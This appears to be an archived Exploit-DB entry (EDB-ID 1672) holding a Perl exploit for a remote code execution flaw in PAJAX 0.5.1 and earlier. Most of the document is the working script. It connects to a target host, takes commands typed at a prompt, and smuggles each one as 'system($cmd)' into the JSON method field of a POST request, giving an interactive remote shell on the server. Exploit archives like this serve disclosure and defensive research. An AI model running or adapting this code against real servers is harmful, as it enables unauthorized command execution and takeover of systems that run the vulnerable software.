PAJAX <= 0.5.1 - Remote Code Execution Exploit

2006-04-13T00:00:00
ID EDB-ID:1672
Type exploitdb
Reporter Stoney
Modified 2006-04-13T00:00:00

Description

PAJAX <= 0.5.1 Remote Code Execution Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

use IO::Socket;

print "PAJAX Remote Code Injection - code by: Stoney - exploit found
by: RedTeam\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $path = $ARGV[1];
 $sock = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$host",
PeerPort =&gt; "80") || die "connecterror\n";
 while (1) {
   print '['.$host.']# ';
   $cmd = &lt;STDIN&gt;;
   chop($cmd);
   last if ($cmd eq 'exit');
   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj-&gt;add\", \"params\": [\"1\", \"5\"]}";

   print $sock "POST ".$path." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
   print $sock "Content-Type: text/json\n";
   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
   while ($ans = &lt;$sock&gt;)
      {
       print "$ans";
      }
  }
 }
else {
 print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
exit;
}

# milw0rm.com [2006-04-13]